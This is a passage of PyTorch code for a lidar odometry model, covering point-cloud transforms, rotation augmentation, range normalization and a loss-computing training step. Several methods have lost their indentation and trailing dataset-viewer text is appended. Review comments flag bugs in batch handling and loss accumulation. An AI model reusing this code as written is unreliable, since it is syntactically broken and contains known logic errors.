computed_transformations=np.asarray(computed_transformations),
path="/tmp/" + self.config["run_name"] + "_plot_trans_rot_" + dataset + "_" + format(data_identifier,
'02d') + ".pdf",
groundtruth=gt_poses,
dataset=dataset)
mlflow.log_artifact(
"/tmp/" + self.config["run_name"] + "_plot_trans_rot_" + dataset + "_" + format(data_identifier,
'02d') + ".pdf")
def log_config(self):
for dict_entry in self.config:
mlflow.log_param(dict_entry, self.config[dict_entry])
    def transform_image_to_point_cloud(self, transformation_matrix, image):
        """Rotate the xyz channels of a range image and keep only valid pixels.

        :param transformation_matrix: batched homogeneous transforms; rotation
            ``[:, :3, :3]`` and translation ``[:, :3, 3]`` are used (assumed
            shape (B, 4, 4) — TODO confirm).
        :param image: projected scan of shape (B, C, H, W) whose channels
            0..2 hold per-pixel xyz; all-zero xyz marks an empty pixel.
        :return: transformed point list (3, N_valid) — see review note below.
        """
        # Flatten the H x W pixel grid into a point list and apply the rotation.
        point_cloud_transformed = torch.matmul(transformation_matrix[:, :3, :3],
                                               image[:, :3, :, :].view(-1, 3, image.shape[2] *
                                                                       image.shape[3]))
        # A pixel is valid if any of its xyz components is non-zero.
        index_array_not_zero = (point_cloud_transformed[:, 0] != torch.zeros(1).to(
            self.device)) | (point_cloud_transformed[:, 1] != torch.zeros(1).to(self.device)) | (
                                       point_cloud_transformed[:, 2] != torch.zeros(1).to(
                                   self.device))
        # NOTE(review): `point_cloud_transformed` is rebound inside the loop,
        # so from the second iteration on the mask indexes the wrong tensor
        # and only the last batch element survives. This appears correct only
        # for batch size 1 — verify before using larger batches.
        for batch_index in range(len(point_cloud_transformed)):
            point_cloud_transformed_batch = point_cloud_transformed[batch_index, :,
                                            index_array_not_zero[batch_index]] + \
                                            transformation_matrix[batch_index, :3, 3].view(1, 3, -1)
            point_cloud_transformed = point_cloud_transformed_batch
        return point_cloud_transformed
def rotate_point_cloud_transformation_matrix(self, transformation_matrix, point_cloud):
return transformation_matrix[:, :3, :3].matmul(point_cloud[:, :3, :])
def transform_point_cloud_transformation_matrix(self, transformation_matrix, point_cloud):
transformed_point_cloud = self.rotate_point_cloud_transformation_matrix(
transformation_matrix=transformation_matrix,
point_cloud=point_cloud)
transformed_point_cloud += transformation_matrix[:, :3, 3].view(-1, 3, 1)
return transformed_point_cloud
def rotate_point_cloud_euler_vector(self, euler, point_cloud):
translation = torch.zeros(3, device=self.device)
euler = euler.to(self.device)
transformation_matrix = self.geometry_handler.get_transformation_matrix_angle_axis(
translation=translation,
euler=euler, device=self.device)
return self.transform_point_cloud_transformation_matrix(
transformation_matrix=transformation_matrix,
point_cloud=point_cloud)
    def augment_input(self, preprocessed_data):
        """Optionally apply a random rotation to the source scan and normals.

        When "random_point_cloud_rotations" is enabled the source scan
        ("scan_2") and its normals are rotated by a random euler vector —
        either yaw-only or a random axis, with magnitude bounded by
        "magnitude_random_rot" (degrees).

        :param preprocessed_data: per-sample dict, mutated keys "scan_2" and
            "normal_list_2".
        :return: the (possibly augmented) dict.
        """
        # Random rotation
        if self.config["random_point_cloud_rotations"]:
            # NOTE(review): this raise makes the augmentation below unreachable
            # until the larger-batch behavior is verified.
            raise Exception("Needs to be verified for larger batches")
            if self.config["random_rotations_only_yaw"]:
                # Rotate around the z-axis only.
                direction = torch.zeros((1, 3), device=self.device)
                direction[0, 2] = 1
            else:
                # Random unit rotation axis.
                direction = (torch.rand((1, 3), device=self.device))
                direction = direction / torch.norm(direction)
            # Magnitude uniform in +-magnitude_random_rot/2 degrees, in radians.
            magnitude = (torch.rand(1, device=self.device) - 0.5) * (
                    self.config["magnitude_random_rot"] / 180.0 * torch.Tensor([math.pi]).to(
                self.device))
            euler = direction * magnitude
            preprocessed_data["scan_2"] = self.rotate_point_cloud_euler_vector(
                point_cloud=preprocessed_data["scan_2"], euler=euler)
            preprocessed_data["normal_list_2"] = self.rotate_point_cloud_euler_vector(
                point_cloud=preprocessed_data["normal_list_2"], euler=euler)
        return preprocessed_data
def normalize_input(self, preprocessed_data):
ranges_1 = torch.norm(preprocessed_data["scan_1"], dim=1)
ranges_2 = torch.norm(preprocessed_data["scan_2"], dim=1)
means_1 = torch.mean(ranges_1, dim=1, keepdim=True)
means_2 = torch.mean(ranges_2, dim=1, keepdim=True)
# Normalization mean is mean of both means (i.e. independent of number of points of each scan)
means_1_2 = torch.cat((means_1, means_2), dim=1)
normalization_mean = torch.mean(means_1_2, dim=1)
preprocessed_data["scan_1"] /= normalization_mean
preprocessed_data["scan_2"] /= normalization_mean
preprocessed_data["scaling_factor"] = normalization_mean
return preprocessed_data, normalization_mean
    def step(self, preprocessed_dicts, epoch_losses=None, log_images_bool=False):
        """Run one forward (and, when training, backward) pass on a batch.

        Projects both scans of every sample to range images, feeds the image
        pair through the odometry model and converts the predicted
        translation + quaternion into transformation matrices. Unless
        "inference_only" is set, point-cloud losses are computed, accumulated
        into ``epoch_losses`` and (in training) back-propagated.

        :param preprocessed_dicts: list (length == batch size) of per-sample
            dicts with "scan_1"/"scan_2", "normal_list_1"/"normal_list_2" and
            "dataset". The dicts are mutated in place (point filtering,
            optional range normalization).
        :param epoch_losses: dict of running epoch sums; required (and
            returned) only when losses are computed.
        :param log_images_bool: when True, render debug images via
            ``create_images`` instead of the extra projection pass.
        :return: ``(epoch_losses, computed_transformations)`` in loss mode,
            otherwise only ``computed_transformations``.
        """
        # Use every batchindex separately
        images_model_1 = torch.zeros(self.batch_size, 4,
                                     self.config[preprocessed_dicts[0]["dataset"]]["vertical_cells"],
                                     self.config[preprocessed_dicts[0]["dataset"]]["horizontal_cells"],
                                     device=self.device)
        images_model_2 = torch.zeros_like(images_model_1)
        for index, preprocessed_dict in enumerate(preprocessed_dicts):
            if self.training_bool:
                # Random rotation augmentation (training only).
                preprocessed_dict = self.augment_input(preprocessed_data=preprocessed_dict)
            if self.config["normalization_scaling"]:
                # NOTE(review): the returned dict is bound to `preprocessed_data`
                # and never used; this still works because normalize_input
                # mutates `preprocessed_dict` in place — confirm intended.
                preprocessed_data, scaling_factor = self.normalize_input(preprocessed_data=preprocessed_dict)
            # Training / Testing
            image_1, _, _, point_cloud_indices_1, _ = self.img_projection(
                input=preprocessed_dict["scan_1"], dataset=preprocessed_dict["dataset"])
            image_2, _, _, point_cloud_indices_2, image_to_pc_indices_2 = self.img_projection(
                input=preprocessed_dict["scan_2"], dataset=preprocessed_dict["dataset"])
            ## Only keep points that were projected to image
            preprocessed_dict["scan_1"] = preprocessed_dict["scan_1"][:, :, point_cloud_indices_1]
            preprocessed_dict["normal_list_1"] = preprocessed_dict["normal_list_1"][:, :, point_cloud_indices_1]
            preprocessed_dict["scan_2"] = preprocessed_dict["scan_2"][:, :, point_cloud_indices_2]
            preprocessed_dict["normal_list_2"] = preprocessed_dict["normal_list_2"][:, :, point_cloud_indices_2]
            image_model_1 = image_1[0]
            image_model_2 = image_2[0]
            # Write projected image to batch
            images_model_1[index] = image_model_1
            images_model_2[index] = image_model_2
        # NOTE(review): only the last sample's indices / images survive the
        # loop here and below (image_1 / image_2) — fine for logging, but
        # verify `images_to_pcs_indices_2` is not expected to hold all samples.
        images_to_pcs_indices_2 = [image_to_pc_indices_2]
        self.log_img_1 = image_1[:, :3]
        self.log_img_2 = image_2[:, :3]
        # Feed into model as batch
        (translations, rotation_representation) = self.model(image_1=images_model_1,
                                                             image_2=images_model_2)
        computed_transformations = self.geometry_handler.get_transformation_matrix_quaternion(
            translation=translations, quaternion=rotation_representation, device=self.device)
        # Following part only done when loss needs to be computed
        if not self.config["inference_only"]:
            # Iterate through all transformations and compute loss
            # (local `losses` dict shadows the imported `losses` module).
            losses = {
                "loss_pc": torch.zeros(1, device=self.device),
                "loss_po2po": torch.zeros(1, device=self.device),
                "loss_po2pl": torch.zeros(1, device=self.device),
                "loss_po2pl_pointwise": torch.zeros(1, device=self.device),
                "loss_pl2pl": torch.zeros(1, device=self.device),
            }
            for batch_index, computed_transformation in enumerate(computed_transformations):
                computed_transformation = torch.unsqueeze(computed_transformation, 0)
                preprocessed_dict = preprocessed_dicts[batch_index]
                # Apply the predicted transform to the source scan and normals.
                scan_2_transformed = self.transform_point_cloud_transformation_matrix(
                    transformation_matrix=computed_transformation,
                    point_cloud=preprocessed_dict["scan_2"])
                normal_list_2_transformed = self.rotate_point_cloud_transformation_matrix(
                    transformation_matrix=computed_transformation,
                    point_cloud=preprocessed_dict["normal_list_2"])
                ## Losses
                losses_trafo, plotting_step = self.lossPointCloud(
                    source_point_cloud_transformed=scan_2_transformed,
                    source_normal_list_transformed=normal_list_2_transformed,
                    target_point_cloud=preprocessed_dict["scan_1"],
                    target_normal_list=preprocessed_dict["normal_list_1"],
                    compute_pointwise_loss_bool=log_images_bool)
                losses["loss_po2po"] += losses_trafo["loss_po2po"]
                losses["loss_po2pl"] += self.config["lambda_po2pl"] * losses_trafo["loss_po2pl"]
                losses["loss_pl2pl"] += losses_trafo["loss_pl2pl"]
                # NOTE(review): the three terms added here are the *running*
                # sums, so samples from earlier iterations are counted more
                # than once in loss_pc — verify this weighting is intended.
                losses["loss_pc"] += (losses["loss_po2po"] + losses["loss_po2pl"] + losses["loss_pl2pl"])
                ## Image of transformed source point cloud
                ## Sparser if loss is only taken on image points, only for first index
                if batch_index == 0:
                    image_2_transformed, u_pixel, v_pixel, _, _ = \
                        self.img_projection(input=scan_2_transformed,
                                            dataset=preprocessed_dict["dataset"])
                    self.log_img_2_transformed = image_2_transformed
                    losses["loss_po2pl_pointwise"] = losses_trafo["loss_po2pl_pointwise"]
                    plotting = plotting_step
                if not self.config["unsupervised_at_start"]:
                    # Supervised warm-up: regress towards the identity transform.
                    target_transformation = torch.eye(4, device=self.device).view(1, 4, 4)
                    loss_transformation = self.lossTransformation(input=computed_transformation,
                                                                  target=target_transformation)
            # Average accumulated losses over the batch.
            losses["loss_pc"] /= self.batch_size
            losses["loss_po2po"] /= self.batch_size
            losses["loss_po2pl"] /= self.batch_size
            losses["loss_pl2pl"] /= self.batch_size
            if not self.config["unsupervised_at_start"]:
                # NOTE(review): loss_transformation holds only the last batch
                # element's value (assigned, not accumulated, in the loop).
                loss_transformation /= self.batch_size
                loss = loss_transformation  # Overwrite loss for identity fitting
            else:
                loss = losses["loss_pc"]
            if self.training_bool:
                # NOTE(review): no optimizer.zero_grad() here — presumably
                # gradients are cleared by the caller; confirm.
                loss.backward()
                self.optimizer.step()
            if self.config["normalization_scaling"]:
                # Undo the range normalization on the predicted translations.
                for index, preprocessed_dict in enumerate(preprocessed_dicts):
                    computed_transformations[index, :3, 3] *= preprocessed_dict["scaling_factor"]
            # Visualization
            if not log_images_bool:
                # Extra projection pass only to obtain pixel coordinates of the
                # (last) transformed source scan for the visibility statistic.
                _, u_pixel, v_pixel, _, _ = \
                    self.img_projection(input=scan_2_transformed,
                                        dataset=preprocessed_dicts[0]["dataset"])
            elif not self.config["po2po_alone"]:
                self.create_images(preprocessed_data=preprocessed_dicts[0],
                                   losses=losses,
                                   plotting=plotting)
            epoch_losses["loss_epoch"] += loss.detach().cpu().numpy()
            epoch_losses["loss_point_cloud_epoch"] += (
                losses["loss_pc"].detach().cpu().numpy())
            epoch_losses["loss_po2po_epoch"] += losses["loss_po2po"].detach().cpu().numpy()
            epoch_losses["loss_po2pl_epoch"] += losses["loss_po2pl"].detach().cpu().numpy()
            epoch_losses["loss_pl2pl_epoch"] += losses["loss_pl2pl"].detach().cpu().numpy()
            # Count transformed-source pixels that fall inside the image's
            # vertical extent (uses v_pixel from whichever branch set it).
            epoch_losses["visible_pixels_epoch"] += np.sum(
                ((torch.round(v_pixel.detach()) < self.config[preprocessed_dicts[0]["dataset"]][
                    "vertical_cells"]) & (v_pixel.detach() > torch.zeros(1).to(self.device))).cpu().numpy())
            return epoch_losses, computed_transformations
        else:
            if self.config["normalization_scaling"]:
                # Undo the range normalization on the predicted translations.
                for index, preprocessed_dict in enumerate(preprocessed_dicts):
                    computed_transformations[index, :3, 3] *= preprocessed_dict["scaling_factor"]
            return computed_transformations
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.